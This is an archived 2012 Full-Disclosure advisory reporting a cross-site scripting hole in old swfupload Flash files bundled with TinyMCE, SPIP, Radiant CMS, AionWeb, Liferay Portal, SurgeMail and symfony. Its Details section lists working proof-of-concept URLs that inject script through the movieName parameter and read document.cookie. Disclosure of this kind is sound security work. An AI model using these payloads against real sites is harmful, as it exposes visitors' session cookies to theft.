lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <007701cdc816$fe3da160$9b7a6fd5@ml>
Date: Wed, 21 Nov 2012 20:35:15 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS vulnerability in swfupload in TinyMCE, SPIP,
	Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony

Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in AionWeb, Magento,
Liferay Portal, SurgeMail, symfony and that this hole is available in many
other web applications.

In previous letters I've wrote concerning web applications with
swfupload.swf and swfupload_f9.swf (which are for Flash Player 10 and Flash
Player 9). And now I'll write about web applications with swfupload_f8.swf
(which is for Flash Player 8). Here is information about Archiv plugin for
TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal (Community Edition, which earlier called Standard
Edition, and Enterprise Edition), SurgeMail, symfony - among multiple web
applications which are bundled with swfupload_f8.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Archiv plugin for TinyMCE,
Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay
Portal (Community Edition, which earlier called Standard Edition, and
Enterprise Edition), SurgeMail, symfony. There is no information that they
have fixed this vulnerability in their software (at that this vulnerability
was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload. But in WordPress and XenForo the swfupload.swf was
fixed, not swfupload_f8.swf and these are different versions of the same
flash application (designed for different versions of Flash Player). Taking
into account current wide spreading of Flash Player 10.x and 11.x, then
developers of these web applications could replace swfupload_f8.swf with new
fixed version of Swfupload.

----------
Details:
----------

XSS (WASC-08):

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Squeeze Documents for SPIP:

http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Upload Manager for Radiant CMS:

http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb also contains swfupload_f8.swf, besides described earlier
swfupload.swf and swfupload_f9.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f8.swf, besides described earlier
swfupload_f9.swf.

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail also contains swfupload_f8.swf, besides described earlier
swfupload.swf and swfupload_f9.swf.

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

symfony also contains swfupload_f8.swf, besides described earlier
swfupload_f9.swf.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ